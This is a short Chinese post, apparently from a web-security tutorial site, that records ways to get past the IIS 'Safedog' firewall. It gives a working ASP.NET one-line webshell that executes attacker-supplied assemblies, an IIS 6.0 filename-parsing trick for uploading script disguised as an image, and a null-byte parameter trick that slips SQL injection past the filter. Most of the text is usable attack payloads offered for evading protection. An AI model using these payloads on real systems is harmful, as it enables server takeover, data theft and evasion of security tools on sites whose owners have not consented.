1、绕过IIS安全狗的一句话。 前几天测试一个网站。找到突破口之后,写入webshell,但服务器上装有IIS安全狗,平时常用的一句话或者shell都用不了。下面这段.net一句话可以突破。 <%@ Page Language="C#" ValidateRequest="false" %> <%try{ System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies["t00ls"].Value))).CreateInstance("c", true, System.Reflection.BindingFlags.Default, null, new object[] { this }, null, null); } catch { }%> 连接端用cncert的aspx一句话客户端。 2、IIS6.0解析 漏洞 遇到安全狗。 文件名为http://www.2cto.com /1. asp ;1.jpg。 这样的会被IIS安全狗果断屏蔽。 改成如下名称,IIS6一样会解析: http://www.2cto.com /;1.asp;1.jpg 3、安全狗的注入绕过。 常用的如 seo .asp?id=1 and 1=1 是会被安全狗屏蔽的。 但如果: seo.asp?seo.com=%00.&id=69%20 and 1=1就可以成功绕过了。
查看更多关于突破安全狗的一些记录 - 网站安全 - 自学php的详细内容...